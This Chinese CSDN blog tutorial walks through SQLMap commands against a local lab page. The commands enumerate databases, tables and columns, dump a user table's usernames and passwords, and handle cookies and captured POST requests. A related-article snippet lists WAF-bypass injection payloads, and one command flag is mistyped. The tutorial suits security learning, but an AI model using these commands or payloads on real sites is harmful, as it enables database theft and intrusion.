SQLMap漏扫工具

最新推荐文章于 2024-03-07 10:07:46 发布
最新推荐文章于 2024-03-07 10:07:46 发布
阅读量990 收藏 2
点赞数 1
文章标签: linux sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62451321/article/details/127479701
版权

SQLMap漏扫工具

一、SQLMap拖库:

SQLMap可以完成注入点的发现,数据库类型的确认,WebShell权限和路径的确认,拖库等一系列功能。测试的Payload共分为5级:Level 1 ~ Level 5,Level 1属于基础级,Payload相对较少,Level 5 Payload很多。

1.查看所有的数据库

sqlmap -u "http://127.0.0.1/security/read.php?id=1" --dbs

2.查看当前使用的数据库

sqlmap -u "http://127.0.0.1/security/read.php?id=1" --current--db

3.发现使用的是learn数据库,接下来对此数据库进行查询

sqlmap -u "http://127.0.0.1/security/read.php?id=1" --tables -D "learn"

4.查出所有表以后,对user表的列名进行查询

sqlmap -u "http://127.0.0.1/security/read.php?id=1" --columns -T "user" -D "learn"

5.users表中的列名已经知道了,可以直接查出所有数据

sqlmap -u "http://127.0.0.1/security/read.php?id=1" --dump -C "userid,username,password" -T "user" -D "learn"

完成拖库操作后,可以在输出中查看到表数据,也可以直接根据提示信息进入相应文件查看内容

6.直接指定数据库类型,节省检测时间

sqlmap -u "http://127.0.0.1/security/read.php?id=1" --dbs --dbms=mysql

7.判断是否是DBA

sqlmap -u "http://127.0.0.1/security/read.php?id=1" -dbms=mysql --is-dba

8.指定Payload级别

--level=5: 探测等级,1-5,默认为1,等级越高,payload越多,速度越慢。HTTP cookei在level为2时就会测试,HTTP User-Agent/Referer在level为3时就会测试。

9.自定义Referer和User-Agent

--random-agent   将从/usr/share/sqlmap/data/txt/user-agents.txt文件中随机读取一条User-Agent
--user-agent=Qiang/Scanner    任意自定义user-agent
--referer=https://www.woniuxy.com/test/1    自行指定referer

二、POST和Cookie

1、如果某个注入点需要先登录,那么可以手工登录后,使用相同的Cookie进行处理

sqlmap -u "127.0.0.1/security/read.php?id=1" --cookie="PHPSESSID=spcldevefisb5k761oqahirsl4"  --dbs

2、如果注入点不是GET请求,而是POST请求,则要添加POST正文

(1)先将POST请求在Burp中进行捕获,将请求内容保存到文件中。

(2)通常的POST请求正文内容如下:

POST /security/read.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=spcldevefisb5k761oqahirsl4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
id=1

(3)运行SQLMap时,再通过-r参数指定文件,同时通过-p参数明确指定参数名(上述请求的参数为id),实现注入。

sqlmap -r ./sql-post.txt -p id --cookie=""  --dbs 
kaiser_yx
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap工具
11-26
sqlmap工具测试sql注入非常方便,使用非常简单。sqlmap洞测试。
VS CODE远程开发入门
云水木石
09-23 2800
在我们办公室,通常配置两台电脑,一台 Windows 主机,主要用于办公、即时通讯,一台 Linux 主机,用于开发。一般开发人员习惯用 Windows 系统下的工具,比如 Source Insight ,但代码需要在 Linux 下编译。这样就需要 Windows 和 Linux 之间协作,通常的做法是在 Linux 下安装 samba 服务,通过 Windows 共享访问。今天看到一篇文章,...
数据安全之认识数据库描系统
学而思(xiejava的blog)
03-07 612
随着信息技术的迅猛发展和互联网的普及,数据库作为存储、管理和检索大量数据的关键组件,其安全性对于企业和组织来说至关重要。然而,由于网络环境的复杂性和攻击手段的多样性,数据库面临着越来越多的安全威胁。黑客可能利用已知的洞或弱点,对数据库进行非法访问、数据窃取或篡改,从而给企业和组织带来巨大的经济损失和声誉风险。为了应对这些安全挑战,数据库描系统应运而生。本文让我们一起来认识一下数据库描系统。
Burp Suite使用介绍说明
crystal_o的博客
05-21 2344
Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。本文主要介绍它的以下特点: 1.Target(目标)——显示目标目录结构的的一个功能 2.Proxy(代理)——拦截HTTP/S的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。 3.Spider(蜘蛛)——应用智能
kali linux中使用SQLMap完成一次对不安全web网站数据库的
xiaojiakun的博客
12-10 1303
SQLMap描不安全web网站的流程 首先收集到目标的网址 此处我不做展示 打开linux 上的终端输入 sqlmap -u "url" 对目标网址进行描 发现目标存在洞(其id是可注入的) 接着我们输入sqlmap -u "url" --dbs 来查询目标的数据库 我查询到了三个 接着我们来看一些我们所浏览的页面(url)在哪个数据库中 输入sqlmap -u "url" ...
sqlmap描网站数据库并得到用户名及密码!
专注前端技术,包括Web端、移动端、小程序、APP
02-04 9611
接着上篇文章,你已经对sqlmap有了了解。那么我们今天就进一步了解sqlmap,使用sqlmap对一个网站解剖分析! SqlMap的程序允许检查网站的SQL注入洞,XSS洞的存在,并且可以还利用SQL注入。支持多种SQL注入类型和多种数据库。 我们可以使用sqlmap检查网站中是否存在洞。 如果该站点容易受到SQL注入的攻击,则骇客可以进行以下攻击: 从数据库接收信息,包括转储(整个)数...
sqlmap基本使用详解与sql注入防御之网络安全
有勇气的牛排博客
07-30 791
1 sqlmap介绍 sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令 sqlmap支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP
sqlmap命令大全(附详细描流程)
m0_50818626的博客
05-24 6444
3.描指定数据库中的所有表名,-D可以指定要描的数据库,这里我的是security库。红框内就是我们所描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.描users中的字段名是什么,-T可以指定描的表。上图红框内就是security库中的所有表啦。可以看到有洞,布尔盲注和时间盲注。可以看到所有的数据库都被描出来了。5.用dump描出字段中的所有数据。2.描所有数据库 -dbs。
第19天-WEB洞-SQL注入之SQLMAP绕过WAF
MCTSOG的博客
03-03 1818
在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF 层等,以便我们更灵活地去构造 Payload,从而可以和各种WAF 进行对抗,甚至绕过安全防御措施进行洞利用。 数据库特性(补充) %23x%0aunion%23x%0Aselect%201,2,3 %20/!44509union/%23x%0aselect%201,2,3 id=1/**&id=-1%20union%20select%201,2,3%23*/ %20union%20all%23%0a%20select%20
渗透测试工具——工具
weixin_59872639的博客
01-16 3万+
安全洞产生的原因 技术原因 软件系统复杂性提高,质量难于控制,安全性降低 公用模块的使用引发了安全问题 经济原因 “柠檬市场”效应——安全功能是最容易删减的部分 环境原因 从传统的封闭、静态和可控变为开放、动态和难控 攻易守难 安全缺陷 安全性缺陷是信息系统或产品自身“与生俱来”的特征,是其“固有成分” 安全洞是与生俱来的 系统设计缺陷 Internet从设计时就缺乏安全的总体架构和设计 TCP/IP中的三阶段握手. 软件源代码的急剧膨胀 Windows 95 1500万行
5 款工具:实用、强力、全面(含开源)
热门推荐
YF云飞的博客
08-03 4万+
5 款实用工具概述&安装
sqlmap工具
10-18
SQLMAP是一款跨平台,开源的SQL注入“企业级”工具,但同时也是很适合个人学习的工具,功能强大.
sqlmap 渗透测试工具
最新发布
04-16
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是描、发现并利用SQL注入洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库...
sqlmap自动工具
06-14
sqlmap工具
sqlmap渗透工具
07-06
sqlmap渗透工具,需要python环境,需要相关使用命令可以看我的博客
sqlmap图形化工具
09-19
Python 和 SQLMAP 依赖 将repo拷贝到你的机器 编辑sqlmap/inc/config.php配置文件...启动sqlmap API服务(python /home/user/tools/sqlmap/sqlmapapi.py -s) 通过浏览器访问Web应用 (http://127.0.0.1/sqlmap/index.php)
网络安全行业黑话大全
城下深蓝的博客
10-03 9516
网络安全行业黑话大全
sqlmap命令详解
Pitbull2014的博客
12-20 1041
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
sqlmap描使用教程(入门+图文)
java
03-09 2634
sqlmap工具初级使用教程(入门+图文)
sqlmap可视化工具开发
07-11
对于sqlmap可视化工具的开发,可以采用以下步骤: 1. 确定功能需求:根据使用sqlmap的场景和用户需求,确定要实现的功能,例如自动化注入测试、结果展示、报告生成等。 2. 设计界面:设计用户友好的界面,包括主界面、配置界面、结果展示界面等。可以使用流行的图形界面开发框架,如Electron、Qt等。 3. 集成sqlmap:将sqlmap的功能集成到可视化工具中。可以通过调用sqlmap的命令行接口或使用sqlmap的API来实现。 4. 实现自动化测试:通过可视化工具提供的配置界面,用户可以设置目标URL、参数等信息,并选择注入类型和测试选项。可视化工具将自动生成sqlmap的命令,并执行注入测试。 5. 结果展示和报告生成:可视化工具可以实时展示注入测试的结果,并提供相关报告的生成功能,包括洞详情、修复建议等。 6. 其他功能增强:根据实际需求,可以添加其他功能,如批量测试、数据备份与还原等。 7. 测试和优化:完成开发后,进行充分的测试和性能优化,确保可视化工具的稳定性和良好的用户体验。 以上是一个简要的开发步骤,实际开发过程中还需要根据具体需求进行调整和完善。希望对你的sqlmap可视化工具开发有所帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值